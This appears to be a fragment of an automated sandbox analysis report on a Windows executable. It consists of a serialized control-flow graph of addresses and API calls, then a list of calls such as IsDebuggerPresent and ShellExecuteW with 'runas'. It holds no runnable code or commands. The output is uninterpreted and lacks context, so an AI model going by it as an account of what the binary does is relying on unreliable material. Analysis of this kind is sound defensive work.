100003 ef0fe6 Mailbox 59 API calls 100001->100003 100008 ed523c 59 API calls 100002->100008 100003->100000 100005->99992 100006->99994 100007->99991 100008->100000 100009->99998 100011 f01b70 __ftell_nolock 100010->100011 100012 ef09d2 GetLongPathNameW 100011->100012 100013 ee1821 59 API calls 100012->100013 100014 ee31f7 100013->100014 100015 ee2f3d 100014->100015 100016 ee1207 59 API calls 100015->100016 100017 ee2f4f 100016->100017 100018 ef0284 60 API calls 100017->100018 100019 ee2f5a 100018->100019 100020 ee2f65 100019->100020 100026 f20177 100019->100026 100021 ee4c94 59 API calls 100020->100021 100023 ee2f71 100021->100023 100062 ed1307 100023->100062 100025 f20191 100026->100025 100068 ee151f 61 API calls 100026->100068 100027 ee2f84 Mailbox 100027->99847 100069 ee49c2 100028->100069 100031 f1f8d6 100186 f39b16 122 API calls 2 library calls 100031->100186 100033 ee49c2 136 API calls 100034 ee27c3 100033->100034 100034->100031 100036 ee27cb 100034->100036 100035 f1f8e7 100037 f1f908 100035->100037 100038 f1f8eb 100035->100038 100039 f1f8f3 100036->100039 100040 ee27d7 100036->100040 100042 ef0fe6 Mailbox 59 API calls 100037->100042 100187 ee4a2f 100038->100187 100193 f347e8 90 API calls _wprintf 100039->100193 100093 ee29be 100040->100093 100061 f1f94d Mailbox 100042->100061 100046 f1f901 100046->100037 100047 f1fb01 100048 ef2f85 _free 58 API calls 100047->100048 100049 f1fb09 100048->100049 100050 ee4a2f 84 API calls 100049->100050 100051 f1fb12 100050->100051 100055 ef2f85 _free 58 API calls 100051->100055 100056 ee4a2f 84 API calls 100051->100056 100199 f2ff5c 89 API calls 4 library calls 100051->100199 100055->100051 100056->100051 100058 ee1a36 59 API calls 100058->100061 100061->100047 100061->100051 100061->100058 100194 f2fef8 59 API calls 2 library calls 100061->100194 100195 f2fe19 61 API calls 2 library calls 100061->100195 100196 f3793a 59 API calls Mailbox 100061->100196 100197 ee343f 59 API calls 2 library calls 100061->100197 100198 ee3297 59 API calls Mailbox 100061->100198 100063 ed1319 100062->100063 100067 ed1338 _memmove 100062->100067 100065 ef0fe6 Mailbox 59 API calls 100063->100065 100064 ef0fe6 Mailbox 59 API calls 100066 ed134f 100064->100066 100065->100067 100066->100027 100067->100064 100068->100026 100200 ee4b29 100069->100200 100074 ee49ed LoadLibraryExW 100210 ee4ade 100074->100210 100075 f208bb 100076 ee4a2f 84 API calls 100075->100076 100078 f208c2 100076->100078 100081 ee4ade 3 API calls 100078->100081 100083 f208ca 100081->100083 100082 ee4a14 100082->100083 100084 ee4a20 100082->100084 100236 ee4ab2 100083->100236 100085 ee4a2f 84 API calls 100084->100085 100087 ee27af 100085->100087 100087->100031 100087->100033 100090 f208f1 100242 ee4a6e 100090->100242 100092 f208fe 100094 f1fd14 100093->100094 100095 ee29e7 100093->100095 100589 f2ff5c 89 API calls 4 library calls 100094->100589 100096 ee3df7 60 API calls 100095->100096 100098 ee2a09 100096->100098 100100 ee3e47 67 API calls 100098->100100 100099 f1fd27 100590 f2ff5c 89 API calls 4 library calls 100099->100590 100101 ee2a1e 100100->100101 100101->100099 100103 ee2a26 100101->100103 100105 ee1207 59 API calls 100103->100105 100104 f1fd43 100107 ee2a93 100104->100107 100106 ee2a32 100105->100106 100581 ef0b8b 60 API calls __ftell_nolock 100106->100581 100109 f1fd56 100107->100109 100110 ee2aa1 100107->100110 100112 ee42cf CloseHandle 100109->100112 100113 ee1207 59 API calls 100110->100113 100111 ee2a3e 100114 ee1207 59 API calls 100111->100114 100116 f1fd62 100112->100116 100117 ee2aaa 100113->100117 100115 ee2a4a 100114->100115 100118 ef0284 60 API calls 100115->100118 100119 ee49c2 136 API calls 100116->100119 100120 ee1207 59 API calls 100117->100120 100121 ee2a58 100118->100121 100122 f1fd7e 100119->100122 100123 ee2ab3 100120->100123 100582 ee3ea1 ReadFile SetFilePointerEx 100121->100582 100125 f1fda3 100122->100125 100591 f39b16 122 API calls 2 library calls 100122->100591 100126 ef0119 59 API calls 100123->100126 100592 f2ff5c 89 API calls 4 library calls 100125->100592 100129 ee2aca 100126->100129 100127 ee2a84 100132 ee410a 2 API calls 100127->100132 100134 ee17e0 59 API calls 100129->100134 100131 f1fdba 100164 ee2c3e Mailbox 100131->100164 100132->100107 100133 f1fd96 100135 f1fdbf 100133->100135 100136 f1fd9e 100133->100136 100137 ee2adb SetCurrentDirectoryW 100134->100137 100138 ee4a2f 84 API calls 100135->100138 100139 ee4a2f 84 API calls 100136->100139 100142 ee2aee Mailbox 100137->100142 100140 f1fdc4 100138->100140 100139->100125 100141 ef0fe6 Mailbox 59 API calls 100140->100141 100148 f1fdf8 100141->100148 100144 ef0fe6 Mailbox 59 API calls 100142->100144 100146 ee2b01 100144->100146 100145 ee27ef 100145->99725 100145->99750 100147 ee433f 59 API calls 100146->100147 100175 ee2b0c Mailbox __wsetenvp 100147->100175 100593 ee343f 59 API calls 2 library calls 100148->100593 100150 ee2c19 100151 ee42cf CloseHandle 100150->100151 100154 ee2c25 SetCurrentDirectoryW 100151->100154 100153 f20032 100156 f3789a 59 API calls 100153->100156 100154->100164 100157 f20054 100156->100157 100599 f3fc0d 59 API calls 2 library calls 100157->100599 100160 f20061 100162 ef2f85 _free 58 API calls 100160->100162 100161 f200cb 100602 f2ff5c 89 API calls 4 library calls 100161->100602 100162->100164 100576 ee3e25 100164->100576 100167 f200e4 100167->100150 100169 f200c3 100601 f2fdb2 59 API calls 4 library calls 100169->100601 100172 ee1a36 59 API calls 100172->100175 100175->100150 100175->100161 100175->100169 100175->100172 100569 ee3ebe 100175->100569 100583 ee2e8f GetStringTypeW 100175->100583 100584 ee2dfe 60 API calls __wcsnicmp 100175->100584 100585 ee2edc GetStringTypeW __wsetenvp 100175->100585 100586 ef386d GetStringTypeW _iswctype 100175->100586 100587 ee27fc 165 API calls 3 library calls 100175->100587 100588 ee314d 59 API calls Mailbox 100175->100588 100176 ee1a36 59 API calls 100182 f1fe41 Mailbox 100176->100182 100180 f20084 100600 f2ff5c 89 API calls 4 library calls 100180->100600 100182->100153 100182->100176 100182->100180 100594 f2fef8 59 API calls 2 library calls 100182->100594 100595 f2fe19 61 API calls 2 library calls 100182->100595 100596 f3793a 59 API calls Mailbox 100182->100596 100597 ee343f 59 API calls 2 library calls 100182->100597 100598 ee314d 59 API calls Mailbox 100182->100598 100183 f2009d 100184 ef2f85 _free 58 API calls 100183->100184 100185 f200b0 100184->100185 100185->100164 100186->100035 100188 ee4a39 100187->100188 100189 ee4a40 100187->100189 100637 ef55c6 100188->100637 100191 ee4a4f 100189->100191 100192 ee4a60 FreeLibrary 100189->100192 100191->100039 100192->100191 100193->100046 100194->100061 100195->100061 100196->100061 100197->100061 100198->100061 100199->100051 100247 ee4b77 100200->100247 100203 ee4b50 100204 ee49d4 100203->100204 100205 ee4b60 FreeLibrary 100203->100205 100207 ef547b 100204->100207 100205->100204 100206 ee4b77 2 API calls 100206->100203 100251 ef5490 100207->100251 100209 ee49e1 100209->100074 100209->100075 100331 ee4baa 100210->100331 100213 ee4b03 100214 ee4a05 100213->100214 100215 ee4b15 FreeLibrary 100213->100215 100217 ee48b0 100214->100217 100215->100214 100216 ee4baa 2 API calls 100216->100213 100218 ef0fe6 Mailbox 59 API calls 100217->100218 100219 ee48c5 100218->100219 100220 ee433f 59 API calls 100219->100220 100221 ee48d1 _memmove 100220->100221 100222 ee490c 100221->100222 100223 f2080a 100221->100223 100224 ee4a6e 69 API calls 100222->100224 100225 f20817 100223->100225 100340 f39ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100223->100340 100227 ee4915 100224->100227 100341 f39f5e 95 API calls 100225->100341 100229 ee4ab2 74 API calls 100227->100229 100232 f20859 100227->100232 100235 ee49a0 100227->100235 100335 ee4a8c 100227->100335 100229->100227 100230 ee4a8c 85 API calls 100231 f20890 100230->100231 100234 ee4ab2 74 API calls 100231->100234 100232->100230 100234->100235 100235->100082 100237 f20945 100236->100237 100238 ee4ac4 100236->100238 100447 ef5802 100238->100447 100241 f396c4 GetSystemTimeAsFileTime 100241->100090 100243 ee4a7d 100242->100243 100244 f20908 100242->100244 100553 ef5e80 100243->100553 100246 ee4a85 100246->100092 100248 ee4b44 100247->100248 100249 ee4b80 LoadLibraryA 100247->100249 100248->100203 100248->100206 100249->100248 100250 ee4b91 GetProcAddress 100249->100250 100250->100248 100252 ef549c _doexit 100251->100252 100253 ef54af 100252->100253 100256 ef54e0 100252->100256 100300 ef8d58 58 API calls __getptd_noexit 100253->100300 100255 ef54b4 100301 ef8fe6 9 API calls ___strgtold12_l 100255->100301 100270 f00718 100256->100270 100259 ef54e5 100260 ef54ee 100259->100260 100261 ef54fb 100259->100261 100302 ef8d58 58 API calls __getptd_noexit 100260->100302 100263 ef5525 100261->100263 100264 ef5505 100261->100264 100285 f00837 100263->100285 100303 ef8d58 58 API calls __getptd_noexit 100264->100303 100268 ef54bf _doexit @_EH4_CallFilterFunc@8 100268->100209 100271 f00724 _doexit 100270->100271 100272 ef9e3b __lock 58 API calls 100271->100272 100283 f00732 100272->100283 100273 f007a6 100305 f0082e 100273->100305 100274 f007ad 100275 ef8a4d __malloc_crt 58 API calls 100274->100275 100277 f007b4 100275->100277 100277->100273 100310 efa05b InitializeCriticalSectionAndSpinCount 100277->100310 100278 f00823 _doexit 100278->100259 100280 ef9ec3 __mtinitlocknum 58 API calls 100280->100283 100282 f007da EnterCriticalSection 100282->100273 100283->100273 100283->100274 100283->100280 100308 ef6e7d 59 API calls __lock 100283->100308 100309 ef6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100283->100309 100286 f00857 __wopenfile 100285->100286 100287 f00871 100286->100287 100299 f00a2c 100286->100299 100317 ef39fb 60 API calls 2 library calls 100286->100317 100315 ef8d58 58 API calls __getptd_noexit 100287->100315 100289 f00876 100316 ef8fe6 9 API calls ___strgtold12_l 100289->100316 100291 f00a8f 100312 f087d1 100291->100312 100292 ef5530 100304 ef5552 LeaveCriticalSection LeaveCriticalSection _fseek 100292->100304 100295 f00a25 100295->100299 100318 ef39fb 60 API calls 2 library calls 100295->100318 100297 f00a44 100297->100299 100319 ef39fb 60 API calls 2 library calls 100297->100319 100299->100287 100299->100291 100300->100255 100301->100268 100302->100268 100303->100268 100304->100268 100311 ef9fa5 LeaveCriticalSection 100305->100311 100307 f00835 100307->100278 100308->100283 100309->100283 100310->100282 100311->100307 100320 f07fb5 100312->100320 100314 f087ea 100314->100292 100315->100289 100316->100292 100317->100295 100318->100297 100319->100299 100321 f07fc1 _doexit 100320->100321 100322 f07fd7 100321->100322 100325 f0800d 100321->100325 100323 ef8d58 ___strgtold12_l 58 API calls 100322->100323 100324 f07fdc 100323->100324 100326 ef8fe6 ___strgtold12_l 9 API calls 100324->100326 100327 f0807e __wsopen_nolock 109 API calls 100325->100327 100330 f07fe6 _doexit 100326->100330 100328 f08029 100327->100328 100329 f08052 __wsopen_helper LeaveCriticalSection 100328->100329 100329->100330 100330->100314 100332 ee4af7 100331->100332 100333 ee4bb3 LoadLibraryA 100331->100333 100332->100213 100332->100216 100333->100332 100334 ee4bc4 GetProcAddress 100333->100334 100334->100332 100336 f20923 100335->100336 100337 ee4a9b 100335->100337 100342 ef5a6d 100337->100342 100339 ee4aa9 100339->100227 100340->100225 100341->100227 100343 ef5a79 _doexit 100342->100343 100344 ef5a8b 100343->100344 100345 ef5ab1 100343->100345 100373 ef8d58 58 API calls __getptd_noexit 100344->100373 100355 ef6e3e 100345->100355 100348 ef5a90 100374 ef8fe6 9 API calls ___strgtold12_l 100348->100374 100354 ef5a9b _doexit 100354->100339 100356 ef6e4e 100355->100356 100357 ef6e70 EnterCriticalSection 100355->100357 100356->100357 100358 ef6e56 100356->100358 100359 ef5ab7 100357->100359 100360 ef9e3b __lock 58 API calls 100358->100360 100361 ef59de 100359->100361 100360->100359 100362 ef59ec 100361->100362 100364 ef59fc 100361->100364 100446 ef8d58 58 API calls __getptd_noexit 100362->100446 100367 ef5a12 100364->100367 100376 ef5af0 100364->100376 100365 ef59f1 100375 ef5ae8 LeaveCriticalSection LeaveCriticalSection _fseek 100365->100375 100405 ef4c5d 100367->100405 100371 ef5a53 100418 f0185f 100371->100418 100373->100348 100374->100354 100375->100354 100377 ef5afd __ftell_nolock 100376->100377 100378 ef5b2d 100377->100378 100379 ef5b15 100377->100379 100381 ef4906 __flsbuf 58 API calls 100378->100381 100380 ef8d58 ___strgtold12_l 58 API calls 100379->100380 100382 ef5b1a 100380->100382 100383 ef5b35 100381->100383 100384 ef8fe6 ___strgtold12_l 9 API calls 100382->100384 100385 f0185f __write 64 API calls 100383->100385 100403 ef5b25 100384->100403 100386 ef5b51 100385->100386 100389 ef5bd4 100386->100389 100390 ef5d41 100386->100390 100386->100403 100387 efc826 ___strgtold12_l 6 API calls 100388 ef5e7c 100387->100388 100388->100367 100392 ef5bfa 100389->100392 100396 ef5cfd 100389->100396 100391 ef5d4a 100390->100391 100390->100396 100393 ef8d58 ___strgtold12_l 58 API calls 100391->100393 100394 f019f5 __lseeki64 62 API calls 100392->100394 100392->100403 100393->100403 100395 ef5c33 100394->100395 100398 ef5c5f ReadFile 100395->100398 100395->100403 100397 f0185f __write 64 API calls 100396->100397 100396->100403 100399 ef5dae 100397->100399 100400 ef5c84 100398->100400 100398->100403 100401 f0185f __write 64 API calls 100399->100401 100399->100403 100402 f0185f __write 64 API calls 100400->100402 100401->100403 100404 ef5c97 100402->100404 100403->100387 100404->100403 100406 ef4c94 100405->100406 100407 ef4c70 100405->100407 100411 ef4906 100406->100411 100407->100406 100408 ef4906 __flsbuf 58 API calls 100407->100408 100409 ef4c8d 100408->100409 100410 efdab6 __write 78 API calls 100409->100410 100410->100406 100412 ef4925 100411->100412 100413 ef4910 100411->100413 100412->100371 100414 ef8d58 ___strgtold12_l 58 API calls 100413->100414 100415 ef4915 100414->100415 100416 ef8fe6 ___strgtold12_l 9 API calls 100415->100416 100417 ef4920 100416->100417 100417->100371 100419 f0186b _doexit 100418->100419 100420 f01878 100419->100420 100421 f0188f 100419->100421 100422 ef8d24 __dosmaperr 58 API calls 100420->100422 100423 f0192e 100421->100423 100425 f018a3 100421->100425 100424 f0187d 100422->100424 100426 ef8d24 __dosmaperr 58 API calls 100423->100426 100427 ef8d58 ___strgtold12_l 58 API calls 100424->100427 100428 f018c1 100425->100428 100429 f018cb 100425->100429 100430 f018c6 100426->100430 100440 f01884 _doexit 100427->100440 100431 ef8d24 __dosmaperr 58 API calls 100428->100431 100432 efd436 ___lock_fhandle 59 API calls 100429->100432 100434 ef8d58 ___strgtold12_l 58 API calls 100430->100434 100431->100430 100433 f018d1 100432->100433 100435 f018e4 100433->100435 100436 f018f7 100433->100436 100437 f0193a 100434->100437 100438 f0194e __lseek_nolock 62 API calls 100435->100438 100441 ef8d58 ___strgtold12_l 58 API calls 100436->100441 100439 ef8fe6 ___strgtold12_l 9 API calls 100437->100439 100442 f018f0 100438->100442 100439->100440 100440->100365 100443 f018fc 100441->100443 100445 f01926 __write LeaveCriticalSection 100442->100445 100444 ef8d24 __dosmaperr 58 API calls 100443->100444 100444->100442 100445->100440 100446->100365 100450 ef581d 100447->100450 100449 ee4ad5 100449->100241 100451 ef5829 _doexit 100450->100451 100452 ef586c 100451->100452 100454 ef5864 _doexit 100451->100454 100456 ef583f _memset 100451->100456 100453 ef6e3e __lock_file 59 API calls 100452->100453 100455 ef5872 100453->100455 100454->100449 100463 ef563d 100455->100463 100477 ef8d58 58 API calls __getptd_noexit 100456->100477 100459 ef5859 100478 ef8fe6 9 API calls ___strgtold12_l 100459->100478 100465 ef5658 _memset 100463->100465 100470 ef5673 100463->100470 100464 ef5663 100548 ef8d58 58 API calls __getptd_noexit 100464->100548 100465->100464 100465->100470 100475 ef56b3 100465->100475 100467 ef5668 100549 ef8fe6 9 API calls ___strgtold12_l 100467->100549 100479 ef58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100470->100479 100471 ef57c4 _memset 100552 ef8d58 58 API calls __getptd_noexit 100471->100552 100473 ef4906 __flsbuf 58 API calls 100473->100475 100475->100470 100475->100471 100475->100473 100480 f0108b 100475->100480 100550 f00ef8 58 API calls 3 library calls 100475->100550 100551 f00dd7 72 API calls 4 library calls 100475->100551 100477->100459 100478->100454 100479->100454 100481 f010c3 100480->100481 100482 f010ac 100480->100482 100484 f017fb 100481->100484 100487 f010fd 100481->100487 100483 ef8d24 __dosmaperr 58 API calls 100482->100483 100486 f010b1 100483->100486 100485 ef8d24 __dosmaperr 58 API calls 100484->100485 100488 f01800 100485->100488 100489 ef8d58 ___strgtold12_l 58 API calls 100486->100489 100490 f01105 100487->100490 100498 f0111c 100487->100498 100491 ef8d58 ___strgtold12_l 58 API calls 100488->100491 100494 f010b8 100489->100494 100492 ef8d24 __dosmaperr 58 API calls 100490->100492 100493 f01111 100491->100493 100495 f0110a 100492->100495 100496 ef8fe6 ___strgtold12_l 9 API calls 100493->100496 100494->100475 100499 ef8d58 ___strgtold12_l 58 API calls 100495->100499 100496->100494 100497 f01131 100500 ef8d24 __dosmaperr 58 API calls 100497->100500 100498->100494 100498->100497 100501 f0114b 100498->100501 100502 f01169 100498->100502 100499->100493 100500->100495 100501->100497 100503 f01156 100501->100503 100504 ef8a4d __malloc_crt 58 API calls 100502->100504 100506 f05e9b __flsbuf 58 API calls 100503->100506 100505 f01179 100504->100505 100507 f01181 100505->100507 100508 f0119c 100505->100508 100509 f0126a 100506->100509 100510 ef8d58 ___strgtold12_l 58 API calls 100507->100510 100512 f01af1 __lseeki64_nolock 60 API calls 100508->100512 100511 f012e3 ReadFile 100509->100511 100516 f01280 GetConsoleMode 100509->100516 100513 f01186 100510->100513 100514 f017c3 GetLastError 100511->100514 100515 f01305 100511->100515 100512->100503 100517 ef8d24 __dosmaperr 58 API calls 100513->100517 100518 f017d0 100514->100518 100519 f012c3 100514->100519 100515->100514 100524 f012d5 100515->100524 100520 f012e0 100516->100520 100521 f01294 100516->100521 100517->100494 100523 ef8d58 ___strgtold12_l 58 API calls 100518->100523 100526 ef8d37 __dosmaperr 58 API calls 100519->100526 100530 f012c9 100519->100530 100520->100511 100521->100520 100522 f0129a ReadConsoleW 100521->100522 100522->100524 100525 f012bd GetLastError 100522->100525 100527 f017d5 100523->100527 100524->100530 100531 f0133a 100524->100531 100532 f015a7 100524->100532 100525->100519 100526->100530 100528 ef8d24 __dosmaperr 58 API calls 100527->100528 100528->100530 100529 ef2f85 _free 58 API calls 100529->100494 100530->100494 100530->100529 100534 f013a6 ReadFile 100531->100534 100540 f01427 100531->100540 100532->100530 100538 f016ad ReadFile 100532->100538 100535 f013c7 GetLastError 100534->100535 100546 f013d1 100534->100546 100535->100546 100536 f014e4 100542 f01494 MultiByteToWideChar 100536->100542 100543 f01af1 __lseeki64_nolock 60 API calls 100536->100543 100537 f014d4 100541 ef8d58 ___strgtold12_l 58 API calls 100537->100541 100539 f016d0 GetLastError 100538->100539 100547 f016de 100538->100547 100539->100547 100540->100530 100540->100536 100540->100537 100540->100542 100541->100530 100542->100525 100542->100530 100543->100542 100544 f01af1 __lseeki64_nolock 60 API calls 100544->100546 100545 f01af1 __lseeki64_nolock 60 API calls 100545->100547 100546->100531 100546->100544 100547->100532 100547->100545 100548->100467 100549->100470 100550->100475 100551->100475 100552->100467 100554 ef5e8c _doexit 100553->100554 100555 ef5e9e 100554->100555 100556 ef5eb3 100554->100556 100566 ef8d58 58 API calls __getptd_noexit 100555->100566 100557 ef6e3e __lock_file 59 API calls 100556->100557 100559 ef5eb9 100557->100559 100561 ef5af0 __ftell_nolock 67 API calls 100559->100561 100560 ef5ea3 100567 ef8fe6 9 API calls ___strgtold12_l 100560->100567 100563 ef5ec4 100561->100563 100568 ef5ee4 LeaveCriticalSection LeaveCriticalSection _fseek 100563->100568 100564 ef5eae _doexit 100564->100246 100566->100560 100567->100564 100568->100564 100570 ee19e1 59 API calls 100569->100570 100571 ee3ed9 100570->100571 100603 ee3a67 100571->100603 100573 ee3ee1 100574 ee1981 59 API calls 100573->100574 100575 ee3ef3 _wcscpy 100573->100575 100574->100575 100575->100175 100577 ee42cf CloseHandle 100576->100577 100578 ee3e2d Mailbox 100577->100578 100579 ee42cf CloseHandle 100578->100579 100580 ee3e3c 100579->100580 100580->100145 100581->100111 100582->100127 100583->100175 100584->100175 100585->100175 100586->100175 100587->100175 100588->100175 100589->100099 100590->100104 100591->100133 100592->100131 100593->100182 100594->100182 100595->100182 100596->100182 100597->100182 100598->100182 100599->100160 100600->100183 100601->100161 100602->100167 100604 ee3aec 100603->100604 100605 ee3a79 100603->100605 100607 ee3b19 100604->100607 100612 ee3b00 100604->100612 100606 ef0fe6 Mailbox 59 API calls 100605->100606 100609 ee3a89 100606->100609 100635 f33796 62 API calls 100607->100635 100610 ef0fe6 Mailbox 59 API calls 100609->100610 100611 ee3a97 100610->100611 100619 ee38c0 100611->100619 100612->100605 100613 ee3b09 100612->100613 100634 ee3a22 65 API calls Mailbox 100613->100634 100617 ee124d 61 API calls 100618 ee3ab3 Mailbox 100617->100618 100618->100573 100620 ee3f20 59 API calls 100619->100620 100633 ee38d5 _memmove 100620->100633 100622 ee39d9 ReadFile 100622->100633 100623 ee3983 100623->100617 100623->100618 100624 ee3968 100625 ee4220 2 API calls 100624->100625 100627 ee3975 _memmove 100625->100627 100626 f20440 100628 ee1c7e 59 API calls 100626->100628 100627->100623 100630 ee410a 2 API calls 100627->100630 100629 f2044a 100628->100629 100632 ef0fe6 Mailbox 59 API calls 100629->100632 100630->100623 100631 ef0fe6 Mailbox 59 API calls 100631->100633 100632->100627 100633->100622 100633->100623 100633->100624 100633->100626 100633->100627 100633->100631 100636 ee42ae SetFilePointerEx 100633->100636 100634->100618 100635->100618 100636->100633 100638 ef55d2 _doexit 100637->100638 100639 ef55fe 100638->100639 100640 ef55e6 100638->100640 100642 ef6e3e __lock_file 59 API calls 100639->100642 100647 ef55f6 _doexit 100639->100647 100650 ef8d58 58 API calls __getptd_noexit 100640->100650 100644 ef5610 100642->100644 100643 ef55eb 100651 ef8fe6 9 API calls ___strgtold12_l 100643->100651 100652 ef555a 100644->100652 100647->100189 100650->100643 100651->100647 100653 ef557d 100652->100653 100654 ef5569 100652->100654 100657 ef5579 100653->100657 100658 ef4c5d __flush 78 API calls 100653->100658 100669 ef8d58 58 API calls __getptd_noexit 100654->100669 100656 ef556e 100670 ef8fe6 9 API calls ___strgtold12_l 100656->100670 100668 ef5635 LeaveCriticalSection LeaveCriticalSection _fseek 100657->100668 100660 ef5589 100658->100660 100671 f00da7 100660->100671 100663 ef4906 __flsbuf 58 API calls 100664 ef5597 100663->100664 100675 f00c32 100664->100675 100666 ef559d 100666->100657 100667 ef2f85 _free 58 API calls 100666->100667 100667->100657 100668->100647 100669->100656 100670->100657 100672 ef5591 100671->100672 100673 f00db4 100671->100673 100672->100663 100673->100672 100674 ef2f85 _free 58 API calls 100673->100674 100674->100672 100676 f00c3e _doexit 100675->100676 100677 f00c62 100676->100677 100678 f00c4b 100676->100678 100680 f00ced 100677->100680 100682 f00c72 100677->100682 100701 ef8d24 58 API calls __getptd_noexit 100678->100701 100730 ef8d24 58 API calls __getptd_noexit 100680->100730 100681 f00c50 100702 ef8d58 58 API calls __getptd_noexit 100681->100702 100685 f00c90 100682->100685 100686 f00c9a 100682->100686 100703 ef8d24 58 API calls __getptd_noexit 100685->100703 100704 efd436 100686->100704 100687 f00c95 100731 ef8d58 58 API calls __getptd_noexit 100687->100731 100691 f00ca0 100693 f00cb3 100691->100693 100694 f00cbe 100691->100694 100692 f00cf9 100732 ef8fe6 9 API calls ___strgtold12_l 100692->100732 100713 f00d0d 100693->100713 100728 ef8d58 58 API calls __getptd_noexit 100694->100728 100697 f00c57 _doexit 100697->100666 100699 f00cb9 100729 f00ce5 LeaveCriticalSection __unlock_fhandle 100699->100729 100701->100681 100702->100697 100703->100687 100705 efd442 _doexit 100704->100705 100706 efd491 EnterCriticalSection 100705->100706 100707 ef9e3b __lock 58 API calls 100705->100707 100708 efd4b7 _doexit 100706->100708 100709 efd467 100707->100709 100708->100691 100712 efd47f 100709->100712 100733 efa05b InitializeCriticalSectionAndSpinCount 100709->100733 100734 efd4bb LeaveCriticalSection _doexit 100712->100734 100735 efd6f3 100713->100735 100715 f00d71 100748 efd66d 59 API calls 2 library calls 100715->100748 100716 f00d1b 100716->100715 100719 efd6f3 __commit 58 API calls 100716->100719 100727 f00d4f 100716->100727 100718 f00d79 100721 f00d9b 100718->100721 100749 ef8d37 58 API calls 2 library calls 100718->100749 100722 f00d46 100719->100722 100720 efd6f3 __commit 58 API calls 100723 f00d5b FindCloseChangeNotification 100720->100723 100721->100699 100725 efd6f3 __commit 58 API calls 100722->100725 100723->100715 100726 f00d67 GetLastError 100723->100726 100725->100727 100726->100715 100727->100715 100727->100720 100728->100699 100729->100697 100730->100687 100731->100692 100732->100697 100733->100712 100734->100706 100736 efd6fe 100735->100736 100737 efd713 100735->100737 100738 ef8d24 __dosmaperr 58 API calls 100736->100738 100740 ef8d24 __dosmaperr 58 API calls 100737->100740 100742 efd738 100737->100742 100739 efd703 100738->100739 100741 ef8d58 ___strgtold12_l 58 API calls 100739->100741 100743 efd742 100740->100743 100745 efd70b 100741->100745 100742->100716 100744 ef8d58 ___strgtold12_l 58 API calls 100743->100744 100746 efd74a 100744->100746 100745->100716 100747 ef8fe6 ___strgtold12_l 9 API calls 100746->100747 100747->100745 100748->100718 100749->100721 100751 ee2cc7 100750->100751 100756 ee2ddb 100750->100756 100752 ef0fe6 Mailbox 59 API calls 100751->100752 100751->100756 100754 ee2cee 100752->100754 100753 ef0fe6 Mailbox 59 API calls 100760 ee2d63 100753->100760 100754->100753 100756->99853 100760->100756 100763 ee20e0 94 API calls 2 library calls 100760->100763 100764 ee3297 59 API calls Mailbox 100760->100764 100765 f2715b 59 API calls Mailbox 100760->100765 100766 ee343f 59 API calls 2 library calls 100760->100766 100761->99856 100762->99858 100763->100760 100764->100760 100765->100760 100766->100760 100767->99871 100768->99872 100770 ee581c 100769->100770 100771 ee5810 100769->100771 100770->100771 100885 ee4d83 100886 ee4dba 100885->100886 100887 ee4dd8 100886->100887 100888 ee4e37 100886->100888 100926 ee4e35 100886->100926 100891 ee4ead PostQuitMessage 100887->100891 100892 ee4de5 100887->100892 100889 f209c2 100888->100889 100890 ee4e3d 100888->100890 100935 edc460 10 API calls Mailbox 100889->100935 100894 ee4e65 SetTimer RegisterWindowMessageW 100890->100894 100895 ee4e42 100890->100895 100899 ee4e28 100891->100899 100896 f20a35 100892->100896 100897 ee4df0 100892->100897 100893 ee4e1a DefWindowProcW 100893->100899 100894->100899 100902 ee4e8e CreatePopupMenu 100894->100902 100900 f20965 100895->100900 100901 ee4e49 KillTimer 100895->100901 100939 f32cce 97 API calls _memset 100896->100939 100903 ee4df8 100897->100903 100904 ee4eb7 100897->100904 100907 f2096a 100900->100907 100908 f2099e MoveWindow 100900->100908 100930 ee5ac3 Shell_NotifyIconW _memset 100901->100930 100902->100899 100910 f20a1a 100903->100910 100911 ee4e03 100903->100911 100933 ee5b29 90 API calls _memset 100904->100933 100906 f209e9 100936 edc483 284 API calls Mailbox 100906->100936 100915 f2096e 100907->100915 100916 f2098d SetFocus 100907->100916 100908->100899 100910->100893 100938 f28854 59 API calls Mailbox 100910->100938 100918 ee4e0e 100911->100918 100919 ee4e9b 100911->100919 100912 f20a47 100912->100893 100912->100899 100915->100918 100921 f20977 100915->100921 100916->100899 100917 ee4e5c 100931 ed34e4 DeleteObject DestroyWindow Mailbox 100917->100931 100918->100893 100937 ee5ac3 Shell_NotifyIconW _memset 100918->100937 100932 ee5bd7 107 API calls _memset 100919->100932 100920 ee4eab 100920->100899 100934 edc460 10 API calls Mailbox 100921->100934 100926->100893 100928 f20a0e 100929 ee59d3 94 API calls 100928->100929 100929->100926 100930->100917 100931->100899 100932->100920 100933->100920 100934->100899 100935->100906 100936->100918 100937->100928 100938->100926 100939->100912

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE526C
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00EE527E
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00EE52E6
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                    • Part of subcall function 00EDBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EDBC07
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EE5366
                                                                  • MessageBoxA.USER32 ref: 00F20B2E
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00F20B66
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F86D10), ref: 00F20BE9
                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00F20BF0
                                                                    • Part of subcall function 00EE514C: GetSysColorBrush.USER32(0000000F), ref: 00EE5156
                                                                    • Part of subcall function 00EE514C: LoadCursorW.USER32(00000000,00007F00), ref: 00EE5165
                                                                    • Part of subcall function 00EE514C: LoadIconW.USER32(00000063), ref: 00EE517C
                                                                    • Part of subcall function 00EE514C: LoadIconW.USER32(000000A4), ref: 00EE518E
                                                                    • Part of subcall function 00EE514C: LoadIconW.USER32(000000A2), ref: 00EE51A0
                                                                    • Part of subcall function 00EE514C: LoadImageW.USER32 ref: 00EE51C6
                                                                    • Part of subcall function 00EE514C: RegisterClassExW.USER32 ref: 00EE521C
                                                                    • Part of subcall function 00EE50DB: CreateWindowExW.USER32 ref: 00EE5109
                                                                    • Part of subcall function 00EE50DB: CreateWindowExW.USER32 ref: 00EE512A
